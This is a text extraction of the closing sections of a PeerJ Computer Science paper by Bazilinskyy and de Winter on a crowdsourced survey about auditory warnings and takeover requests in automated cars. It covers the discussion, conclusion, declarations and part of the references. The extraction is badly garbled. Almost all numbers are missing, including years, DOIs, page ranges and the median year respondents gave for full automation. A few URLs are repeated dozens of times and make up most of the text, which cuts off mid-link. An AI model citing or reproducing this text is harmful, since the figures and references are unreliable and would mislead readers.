). in the present study, we also observed small age effects regarding the self-reported annoyance of the three proposed systems: younger participants saw the pa and fcws as more annoying than older respondents did. however, young respondents perceived the fs as less annoying than the older respondents. it is known that younger peo- ple are more likely to accept new technologies (lee, ; tacken et al., ), and thus may be more successful at envisioning such abstract concepts as the fs. a somewhat stronger age effect was observed regarding helpfulness: older respondents found the fcws more helpful than the younger participants. it is known that young people feel more confident behind the wheel (matthews & moran, ; lee et al., ; lee, ; clarke, ward & truman, ), and therefore may think they need less external help than older drivers. bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. crowdflower offers a platform that supports full anonymity of participants. 
this anonymity may have encouraged respondents to express their thoughts freely, without the fear of being judged by the organizers of the survey. all but the last free-response items required people to enter at least one character. a large number of respondents did not provide meaningful comments. however, a substantial portion of respondents did provide valuable answers, facilitating the understanding of what people think about not only the use of auditory interfaces in future highly and fully automated cars, but also about the concept of automated driving in general. numerous respondents expressed their concerns about the qualities of current pa and fcws systems. some participants suggested that they want to be aided by visual and vibratory feedback in addition to auditory feedback. a number of people indicated the inaccessibility of modern pas and fcwss to deaf users. however, current systems also provide haptic and/or visual cues (bmw, ; volvo, b; ford, ; honda, ), and so people with a hearing impairment could still benefit from such multimodal feedback. some respondents were sceptical about the introduction of highly and fully automated vehicles, which may be related to general consumer scepticism about new technologies. respondents expected that most cars would drive fully automatically by the year (median value), a result that matches findings in previously published research (sommer, ; de winter et al., ; kyriakidis, happee & de winter, ). the total cost of the study performed by means of a crowdsourced online-based survey was lower than what is offered by companies that conduct similar surveys with help of classic recruitment methods (de winter et al., ). a group of people filled in the survey more than once, and we reasoned that their responses ought not to be trusted. thus, we applied a strict filter, and removed all respondents who filled out the survey more than once. we also excluded all people who had one or more missing items. with appropriate data quality control mechanisms, crowdsourcing is known to be a powerful research tool (howe, ; kittur, chi & suh, ; mason & suri, ; crump, mcdonnell & gureckis, ). nonetheless, as with any self-report questionnaire, the validity of the results is limited to what people can imagine or retrieve from their memory. furthermore, crowdflower respondents are not representative of the entire population of stakeholders of future had cars. it is likely that highly automated vehicles will initially be purchased by wealthy people, while projects on crowdflower are often completed by people from low-income countries (kyriakidis, happee & de winter, ). in conclusion, the present survey study showed that the pa and fcws were well appreciated by respondents, whereas the proposed future system (fs) was not rated highly. a second conclusion is that the female voice is the most preferred takeover request among the offered options. the scientific community and the automotive industry may be able to use the information gathered in the present survey for the development of automated driving systems, in particular future iterations of parking assistants and forward collision warning systems, as well as for the design of human-machine interfaces for automated driving. bazilinskyy and de winter ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. acknowledgements we would like to express our special gratitude to daria nikulina for designing the illustrations used in the survey. 
additional information and declarations
funding
the research presented in this paper is being conducted in the project hfauto–human factors of automated driving (pitn-ga- - ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.
grant disclosures
the following grant information was disclosed by the authors: hfauto–human factors of automated driving: pitn-ga- - .
competing interests
the authors declare there are no competing interests.
author contributions
• pavlo bazilinskyy conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper, organised outsourcing of creation of illustrations.
• joost de winter conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper.
human ethics
the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the research was approved by the human research ethics committee (hrec) of the delft university of technology.
supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.
references
adell e, varhelyi a, fontana md, bruel l. . test of hmi alternatives for driver support to keep safe speed and safe distance—a simulator study. the open transportation journal : – doi . / .
alicandri e, moyer mj. . human factors and the automated highway system. proceedings of the human factors and ergonomics society annual meeting : – doi . / .
arrabito gr. . effects of talker sex and voice style of verbal cockpit warnings on performance. human factors : – doi . / .
bainbridge l. . ironies of automation. automatica : – doi . / - ( ) - .
banks va, stanton na, harvey c. . sub-systems on the road to vehicle automation: hands and feet free but not 'mind' free driving. safety science : – doi . /j.ssci. . . .
barón a, green p. . safety and usability of speech interfaces for in-vehicle tasks while driving: a brief literature review. technical report no. umtri- - . ann arbor: transportation research institute, university of michigan. available at http://www.umich.edu/~driving/publications/umtri- - a.pdf (accessed july ).
begault dr. . head-up auditory displays for traffic collision avoidance system advisories: a preliminary investigation. human factors : – doi . / .
beiker sa. . legal aspects of autonomous driving: the need for a legal infrastructure that permits autonomous driving in public to maximize safety and consumer benefit. santa clara law review : – .
belz sm, robinson gs, casali jg. . a new class of auditory warning signals for complex systems: auditory icons. human factors : – doi . / .
bergenhem c, pettersson h, coelingh e, englund c, shladover s, tsugawa s. . overview of platooning systems. in: proceedings of the th its world congress, vienna, austria. available at http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf (accessed july ).
bmw. . bmw connecteddrive from a to z. available at http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html (accessed november ).
bmw. . bmw x : park assistant. available at http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver assistance/park assistant.html#t=l (accessed november ).
bosker b. . why siri's voice is now a man (and a woman). available at http://www.huffingtonpost.com/ / / /siri-voice-man-woman n .html (accessed december ).
braitman ka, mccartt at, zuby ds, singer j. . volvo and infiniti drivers' experiences with select crash avoidance technologies. traffic injury prevention : – doi . / .
brandenburg s, skottke e. . switching from manual to automated driving and reverse: are drivers behaving more risky after highly automated driving? in: proceedings of the ieee th international conference on intelligent transportation systems (itsc), qingdao, china. – .
bregman as. . auditory scene analysis: the perceptual organization of sound. cambridge, ma: mit press.
bronkhorst aw, veltman ja, van breda l. . application of a three-dimensional auditory display in a flight task. human factors : – doi . / .
clarke dd, ward p, truman w. . voluntary risk taking and skill deficits in young driver accidents in the uk. accident analysis & prevention : – doi . /j.aap. . . .
http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://publications.lib.chalmers.se/records/fulltext/ /local_ .pdf http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html 
http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ 
/a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/insights/technology/connecteddrive/ /a_to_z/index.html http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / 
/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / 
/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / 
/showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.bmw.com/com/en/newvehicles/x/x / /showroom/driver_assistance/park_assistant.html#t=l http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html http://www.huffingtonpost.com/ / / /siri-voice-man-woman_n_ .html 
.html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www .mercedes-benz.co.uk/content/unitedkingdom/mpc/mpc_unitedkingdom_website/en/home_mpc/passengercars/home/corporate_sales /fleet/leasing/our_advantages/safety. .html http://www 